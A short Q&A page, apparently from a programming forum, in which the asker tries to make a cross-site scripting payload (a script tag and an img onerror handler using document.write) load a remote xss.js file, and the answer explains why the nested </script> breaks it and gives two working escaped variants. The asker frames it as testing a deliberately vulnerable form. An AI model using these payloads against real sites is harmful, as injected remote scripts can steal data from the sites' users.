在语法中加载外部javascript

Question

How do i load an external .js script using this syntax?:

<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script> .

For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :

<script src=//ha.ckers.org/xss.js></script>

Could easily work but i'm just trying to figure out how i could do it using document.write.

Thanks to anyone who is able to help me. //Edit Why doesn't this work? <img src=x onerror=document.write('<script src="http://ha.ckers.org/xss.js"><\\/script>')>

Answer 1

What you have to remember is that what lies within the <script>....</script> tags is opaque to the browser. Its job is, having seen <script> , to gather up everything largely without parsing it until it sees </script> and then had that intervening text off to the JavaScript engine.

In your case, what it sees between <script> and </script> is:

document.write('<script src=http://ha.ckers.org/xss.js>

...which obviously results in a syntax error. That's because the first </script> terminates the first <script> :

<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->

You have to break it up so it's not the literal sequence </script> . There are lots of ways to do that. Add a \\ :

<script>document.write('<script src=http://ha.ckers.org/xss.js><\/script>')</script>

or break the string:

<script>document.write('<script src=http://ha.ckers.org/xss.js></scr' + 'ipt>')</script>